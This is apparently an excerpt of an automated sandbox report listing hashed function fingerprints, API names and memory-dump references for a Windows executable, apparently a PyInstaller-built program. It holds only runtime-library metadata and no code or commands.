                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                • Instruction ID: f2c38e7197dc47f755e4f4fc9c59db98361e6111eec2564fce082d899a9c6c20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD114230F0E642C1F954B7256651179A141BF447B0F4843B6E9BECA6E6DE2CE8536620
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                • Instruction ID: a7c59440312e414eb45501e4215159a45bdf2630f38a480631a7a9cb66714bfc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55112A30E0B607C1F968B369552117EA1427F45330F0587B6E9BECA6E2DE2CB8437621
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction ID: 029716ed5396281287a4dffc1d1ab351e8600db91d936e2610ba09f5588f5359
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A191EF32A0A646C1E761AE34D45137EF6A1BB40B94F458173DADD873E6DE3DE806A320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction ID: 9348ed71f51d04c17e839115223ea3fa1f877271958ed8dd80b1b1c630cc1a3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2818272E0AB43C5F7657F298114379A6A0BF11B44F9540B7CA89DB2A5CF2DE903E221
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction ID: 98dcf7417924f674e25cd5397a310b5af2a44ef7f57e879608483f97f31464f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87516B32A1A742CAEB54AF15E484A786395FB44B98F1081B3DB4EC7788DF7CE846D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction ID: c8dbcb5096e1f1895d8f0742af8fbc119d5143735d394ae0909549876aa5af07
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E517B32A09383CAEE74AF21905426877A4FB55B84F1481F7DA4D87B85CF7CE46ADB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction ID: 0dd16f1ab221df28e08841f81d174c24e8a07044ecf57a563dc49b2353fe2895
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A618332909BC6C5EB60AF15E4407AAB7A0FB85794F0442B6EB9C83B95DF7CD195CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction ID: d61d6d058a475f23e1ff48388eb34332a7da2ae6080f0d68f3a146158cf6c21f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21AE72B0AB4282E710AB14F8447EA73A4FB88780F404176EA8D97769DF3CD64AD740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction ID: e7f0de8043481c038adfd0f1c10daa6e5205434f7d499654e92242e6789d188c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D10372B0AA41CAE711DF75D4402AC77B1FB94798B018276DE8E97B99DE38D40BE310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction ID: 0f17c19824ff5b9fa9ac18b7a6d36f7b16fecfec4dd2154750755c0d9bda41d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6110C31F0D143C2FE54AF6AE5446BA5252FF84780F4480B2DF4947B9ADD3DD9CAA200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                • Instruction ID: a53b91ddfb85af0289ac4f83b414d455d10152489fef31206094ac7deed98899
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1841EA32A0A382C7F764A72594413796654FB80BA4F14427BEE5C87AD5DF3ED8429710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE39046
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6AAE2CBA5), ref: 00007FF6AAE39064
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, xrefs: 00007FF6AAE39052
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                                • API String ID: 3580290477-3206695957
                                                                                                                                                                                                                                • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                • Instruction ID: a6bb9089be28cfcd7c644ecae53a99468f168a23371b968a1db4559053d68818
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11418132A0AA42C5EB15EF21D4500BCA7A4FF447D0B5540B6EA8E93BA5DF3DE8929310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction ID: 7d0310718f451ef5da52cb25d1ff45fda5418a4bba3f1105981a2ca76f882bfa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F41E532B19A41C2DB61AF25E4443AAA7A4FB88784F804032EE8DC7794DF3DD446E750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
